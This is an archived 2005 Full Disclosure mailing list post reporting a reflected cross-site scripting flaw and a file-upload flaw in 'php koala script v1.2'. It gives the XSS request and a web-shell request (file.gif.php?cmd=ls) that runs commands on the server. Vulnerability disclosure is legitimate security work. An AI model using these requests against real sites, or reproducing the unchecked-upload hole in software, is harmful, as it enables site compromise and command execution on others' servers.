Full Disclosure mailing list archives

xss in php koala script v1.2

From: shieldmaiden333 () aol com
Date: Fri, 14 Oct 2005 18:11:48 -0400

xss
/info.php?user=<xss>
 
and an upload vulnerability if you upload a file named file.gif.php
/upload/file.gif.php?cmd=ls
 
file.gif.php is attached

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

xss in php koala script v1.2 shieldmaiden333 (Oct 14)